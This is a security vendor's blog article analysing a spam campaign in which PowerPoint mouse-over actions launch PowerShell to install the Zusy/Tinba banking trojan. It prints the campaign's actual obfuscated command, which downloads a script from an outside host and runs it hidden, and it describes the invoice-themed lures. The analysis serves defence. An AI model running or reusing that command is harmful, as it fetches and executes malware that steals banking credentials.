Attackers have been spotted experimenting with a tricky new method of delivering malware via PowerPoint files. This particular technique exploits the feature in PowerPoint that enables mouse-over actions, abusing it to launch a PowerShell command that triggers the infection process.
It's a relatively novel approach compared to the tried-and-true tactic of abusing macros in malicious Microsoft Word docs that attackers have been using for years. The good news is users are still required to jump through some fairly cumbersome hoops in order to get this attack to work. The even better news is even if it does get launched, Barkly blocks this attack from succeeding before any damage is done.
Let's take a closer look at how this attack works, but first...
Thanks for reporting a problem. We'll attach technical data about this session to help us figure out the issue. Which of these best describes the problem?
Any other details or context?
Hiding malware in Microsoft Office files has long been a favorite go-to trick for attackers, but the way they usually go about it is by tricking users into opening a malicious document (most commonly a Word doc) and enabling macros.
Macros are basically commands that can automate tasks and provide additional functionality — so you can understand why attackers might be into leveraging them. Some of the most prolific malware in recent years (Locky ransomware and the Dridex banking trojan are just two examples) has been primarily delivered via malicious macros hidden in Word document email attachments, prompting many security vendors and experts to recommend disabling macros by default.
This attack stands apart by not relying on macros. Instead, it leverages the additional command-launching funtionality that PowerPoint's mouse-over actions provide.
Looking at the Action Settings in the malicious PowerPoint file, we can actually see the PowerShell command designed to call out and download the additional malware:
powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('http:'+[char] 0x2F+[char] 0x2F+'cccn.nl'+[char] 0x2F+'c.php',\"$env:temp\ii.jse\"); Invoke-Item \"$env:temp\ii.jse\""
When a user opens one of the malicious PowerPoint files they're presented with a single slide with large hyperlinked text that reads, "Loading...Please wait".
By using a mouse-over action, the attackers have booby-trapped the file to automatically trigger a malicious PowerShell command as soon as a user hovers over the link. In other words, a user doesn't even have to click on the link to initiate the infection process.
What makes this potentially so dangerous is that users are routinely told to hover over links to determine the URL path as a security best practice. Unfortunately, in this case that advice will result in them getting infected.
The good news is if the user is running an updated version of Microsoft Office, the Protected View security feature should be enabled by default. If it is, a Microsoft PowerPoint Security Notice message should be triggered at this point warning the user of the dangers of allowing an external program to run and offering them the option of disabling it.
If the user chooses to enable the program, however, the PowerShell command will call out to a server to grab additional components necessary to launch the attack (for more details, see this analysis from researcher Ruben Dodge.
This is the point at which having Barkly installed on the endpoint would automatically block the attempted attack in progress.
The current payload being delivered by this attack has been identified as a variant of the Zusy banking trojan (aka Tinba or Tiny Banker). First discovered back in 2012, Zusy is known for "man-in-the-browser" attacks — adding convincing pop-up forms to legitimate banking websites in order to steal visitor credentials.
A fake pop-up form injected by the Tinba banking trojan / Avast
The PowerPoint files are being distributed as attachments in spam emails disguised as invoices or payment confirmations with subject lines like "Purchase Order #XXXXXX" and "Confirmation".
The PowerPoint files themselves are being named variations of "order.ppsx," "invoice.ppsx," or "order&prsn.ppsx."
Jonathan writes about cybersecurity from a practical point of view. He has a strict whitelisting policy for filtering out jargon and only sharing tips and tools that actually work.
See how Barkly’s Runtime Malware Defense blocks new attacks other solutions miss, no updates required.
